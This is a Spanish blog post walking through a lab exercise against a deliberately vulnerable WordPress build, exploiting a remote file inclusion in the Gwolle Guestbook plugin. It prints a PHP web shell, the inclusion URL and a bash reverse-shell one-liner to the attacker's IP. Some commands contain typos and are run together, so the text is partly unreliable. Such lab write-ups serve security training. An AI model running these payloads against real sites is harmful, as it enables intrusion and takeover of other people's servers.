Para realizar esta técnica nos clonamos un repositorio de wordpress que sea vulnerable

git clone https://github.com/vavkamil/dvwp
docker-compose up -d --build
docker-compose run --rm wp-cli install-wp

Vemos que corre en el puerto 31337

localhost:31337

Te abre un panel de wordpress donde crear una cuenta con dominio, usuario, password y un correo(falso)

Login te logeas y ya estaría operativo, faltarían los plugins desde la terminal–>

searchsploit gwolle

Habría que activar el plugin que te has descargado, si no te deja hacer a www-data propietario del gwole

usermod -a -G www-data (tu nombre de usuario)
chgrp www-data /home/myuser/gwole
chmod g+rwxs /home/myuser/gwole

Estando en /usr/share/SecLists/Discovery/Web-Content/CMS searchsploit gwolle

searchsploit -x php/webapps/38861.txt

No nos deja en un principio, pero nos comentan en la propia herramienta que hay que incluir en el php.ini

allow_url_include = 'on'"

recargamos, si estamos en docker habría que cerrarlo y volver a lanzarlo,

Me pongo en escucha

python3 -m http.server 80

y me debería de mostrar una respuesta 200 ok

Me creo un archivo que se llame wp-load.php

<?php
    system('whoami');
?>

recargo y me debería de mostrar www-data o podria hacer tambien:

<?php
    system('hostname -I');
?>

me debería de mostrar la ip del contenedor de la web que usa este plugin, acabo de realizar un remote file inclusion si queremos controlar el comando,

<?php
    system($_GET['cmd']);
?>

Recargo y en la barra de direcciones del navegador

localhost:31337/wp-cpntent/plugins/gwolle-gd/frontend/capcha/ajaxresponse.php?abspath=http://[mi ip]/&cmd=whoami

<– ese comando ya se lo estoy inyectando yo

Me pongo en escucha con netcat podría inyectarle el típico one-linner

nc -nlvp 443 localhost:31337/wp-cpntent/plugins/gwolle-gd/frontend/capcha/ajaxresponse.php?abspath=http://[mi ip]/&cmd=bash -c "bash -i >& /dev/tcp/[mi ip]/443 0>&1"

y así me he creado una revershell.

Ya estaría dentro de la máquina, le hago un tratamiento de la tty

script /dev/null -c bash
control+z stty
raw -echo; fg
export TERM=xterm
stty raw 44 colums 184

Categorías: Hacking

0 comentarios

Deja una respuesta

Marcador de posición del avatar